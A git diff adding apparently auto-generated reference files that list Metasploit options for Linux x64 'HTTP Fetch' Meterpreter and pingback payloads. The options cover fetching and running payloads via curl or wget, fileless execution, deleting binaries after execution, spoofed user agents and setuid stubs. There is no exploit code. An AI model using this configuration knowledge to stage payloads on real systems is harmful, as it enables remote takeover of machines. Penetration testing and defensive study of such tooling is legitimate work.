-------- ----------- +FETCH_FILENAME dwYkaNCfv no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-reverse_sctp.txt b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-reverse_sctp.txt new file mode 100644 index 0000000..c453074 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-reverse_sctp.txt @@ -0,0 +1,103 @@ + + Name: HTTP Fetch, Reverse SCTP Stager + Module: payload/cmd/linux/http/x64/meterpreter/reverse_sctp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 111 + +Evasion options for payload/cmd/linux/http/x64/meterpreter/reverse_sctp: +========================= + +tman@sempervictus> + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME YrQIaUhKemN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..234ba5e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter-reverse_tcp.txt @@ -0,0 +1,103 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/x64/meterpreter/reverse_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 111 + +Evasion options for payload/cmd/linux/http/x64/meterpreter/reverse_tcp: +========================= + + + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME clGbLkazLEp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..ff3d6ad --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_http.txt @@ -0,0 +1,103 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/x64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/x64/meterpreter_reverse_http: +========================= + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME PXXxsZpFxU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..46baf06 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_https.txt @@ -0,0 +1,105 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/x64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/x64/meterpreter_reverse_https: +========================= + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME PxArnjQCup no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..c57417a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-meterpreter_reverse_tcp.txt @@ -0,0 +1,96 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/x64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WcldDeooyHS no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-pingback_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-pingback_bind_tcp.txt new file mode 100644 index 0000000..6ccb1ad --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-pingback_bind_tcp.txt @@ -0,0 +1,72 @@ + + Name: HTTP Fetch, Linux x64 Pingback, Bind TCP Inline + Module: payload/cmd/linux/http/x64/pingback_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host 